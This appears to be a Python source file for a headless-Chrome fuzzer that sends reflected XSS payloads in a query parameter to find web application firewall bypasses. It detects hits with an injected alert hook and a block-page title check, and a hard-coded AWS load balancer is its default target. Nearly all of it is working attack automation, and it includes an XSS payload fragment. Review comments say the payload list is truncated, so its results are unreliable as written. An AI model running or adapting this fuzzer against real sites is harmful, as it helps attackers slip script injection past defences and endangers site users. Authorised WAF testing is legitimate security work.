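"""Headless-Chrome XSS fuzzer that probes a WAF for reflected-payload bypasses.

Each candidate payload is placed in the ``param2`` query parameter of the
target, loaded in Chrome, and counted as a bypass when the rendered response
is not the WAF block page AND the injected ``window.alert`` hook observed a
call.

NOTE(review): this is an offensive tool.  Point it only at systems you are
authorised to test; the default target below is a lab load balancer.
"""
import sys
import time  # kept: present in the original module (unused here)
from urllib.parse import unquote  # kept: present in the original module (unused here)
from urllib.parse import urlencode
from urllib.parse import urlparse

import selenium  # kept: present in the original module (unused here)
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait


# WAFBypass class
class WAFBypass():
    """Drive one headless Chrome against a target and fuzz a query parameter."""

    # Injected into every new document before page scripts run (via CDP
    # Page.addScriptToEvaluateOnNewDocument).  It replaces window.alert with a
    # flag-setter, so a payload that calls alert() is recorded instead of
    # blocking the browser on a modal.  Payloads that fire other sinks
    # (confirm/prompt, inline handlers that never call alert, ...) are NOT
    # detected by this hook.
    code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}"

    # Seconds to wait for document.readyState == "complete" per navigation.
    PAGE_LOAD_TIMEOUT = 4
    # Title Chrome renders for the response the WAF returns on a block.
    # Heuristic only: Selenium exposes no HTTP status, so the block page is
    # recognised by its title; a differently configured WAF needs another
    # marker.
    BLOCK_PAGE_TITLE = "403 Forbidden"
    # Highest Unicode code point; the fuzz loop walks every one of them.
    MAX_CODEPOINT = 0x10FFFF

    def __init__(self, url) -> None:
        """Start Chrome, verify *url* is reachable and install the alert hook.

        Args:
            url: Base URL of the target; only its scheme and netloc are used
                when fuzz URLs are built.

        Raises:
            Exception: "Connection Error" if the probe GET fails.  The browser
                is shut down before raising so no chromedriver process leaks
                (the original left it running on this path).
        """
        self.options = webdriver.ChromeOptions()
        # --no-sandbox disables Chrome's renderer sandbox.  It is commonly
        # needed to run as root inside a container, but it means a malicious
        # response from the target could compromise this host; prefer running
        # as an unprivileged user so the flag can be dropped.
        self.options.add_argument('--no-sandbox')
        self.options.add_argument('--headless')
        self.driver = webdriver.Chrome(options=self.options)
        self.url = urlparse(url)
        if not self.check_connection():
            self.driver.quit()
            raise Exception("Connection Error")
        # Registered after the probe GET, so the hook is only present on the
        # documents loaded later by navigate().
        self.driver.execute_cdp_cmd(
            "Page.addScriptToEvaluateOnNewDocument", {"source": self.code})

    def check_connection(self):
        """Return True if the target's base URL loads without a WebDriver error.

        Narrowed from a bare ``except:``, which also swallowed Ctrl-C and
        SystemExit.
        """
        try:
            self.driver.get(self.url.geturl())
        except Exception:
            return False
        return True

    def wait_for_pageload(self):
        """Block until document.readyState is "complete" or the timeout elapses.

        Raises:
            Exception: "Page Load Error" on timeout.  WebDriverWait raises
                selenium's TimeoutException, not the builtin TimeoutError the
                original caught, so the timeout used to escape unhandled.
        """
        try:
            WebDriverWait(self.driver, self.PAGE_LOAD_TIMEOUT).until(
                lambda driver: driver.execute_script("return document.readyState") == "complete")
        except (TimeoutException, TimeoutError) as err:
            raise Exception("Page Load Error") from err

    def get_page_title(self):
        """Return the title of the currently loaded document."""
        return self.driver.title

    @property
    def is_403(self):
        """True when the loaded page carries the WAF block-page title."""
        return self.driver.title == self.BLOCK_PAGE_TITLE

    @property
    def triggered_xss(self):
        """True if the hooked window.alert ran on the current document.

        Coerced to bool so a document where the flag is absent (the hook did
        not run) reports False rather than None.
        """
        return bool(self.driver.execute_script("return window.alert_trigger"))

    def navigate(self, url):
        """Load *url* and report whether it both evaded the WAF and fired alert().

        Args:
            url: Fully built fuzz URL.

        Returns:
            bool: True only when the page is not the block page AND the alert
            hook was triggered.  The block-page check runs first so the JS
            probe is skipped on blocked responses, as in the original.
        """
        self.driver.get(url)
        self.wait_for_pageload()
        if self.is_403:
            return False
        return self.triggered_xss

    def run_fuzz(self):
        """Walk every Unicode code point through each payload's ``{FUZZ}`` slot.

        For each (code point, payload) pair the substituted payload is sent as
        ``?param2=...`` to the target and the verdict of navigate() is printed.
        A hit breaks out of the payload loop for that code point only; the
        scan continues with the next code point so later bypasses are still
        reported.  Ctrl-C shuts the browser down and exits with status 0.
        """
        # NOTE(review): this payload list looks truncated (the HTML tags were
        # probably stripped when the file was published) -- none of the entries
        # contains "{FUZZ}", so the replace() below is currently a no-op.
        # Restore the intended payloads before relying on the results.
        payloads = [
            "",
            "",
            "\u202e",
            """<<\nscrip t="alert(0)""",
        ]
        last = self.MAX_CODEPOINT
        try:
            # Inclusive upper bound: the original stopped one short of 0x10FFFF.
            for i in range(0, last + 1):
                if 0xD800 <= i <= 0xDFFF:
                    # Lone surrogates cannot be UTF-8 encoded; urlencode() would
                    # raise UnicodeEncodeError and abort the whole scan.
                    continue
                ch = chr(i)
                for p in payloads:
                    encoded = urlencode(
                        {"param2": p.replace("{FUZZ}", ch)})
                    # Progress counter now shows the real upper bound (the
                    # original printed 0xffff while looping to 0x10FFFF).
                    print("Trying payload: ", encoded, f"({hex(i)}/{hex(last)})")
                    url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
                    bypassed = self.navigate(url)
                    if bypassed:
                        print("Bypassed with payload: ", encoded)
                        break
        except KeyboardInterrupt:
            # quit() ends the chromedriver and browser processes; close() only
            # closed the window and leaked both.
            self.driver.quit()
            sys.exit(0)


# Original hard-coded lab target, kept as the default so invocation without
# arguments behaves as before.
DEFAULT_TARGET = "http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com"

if __name__ == "__main__":
    # Guarded so importing this module no longer launches a browser and
    # starts scanning.  Only scan hosts you are authorised to test.
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_TARGET
    w = WAFBypass(target)
    w.run_fuzz()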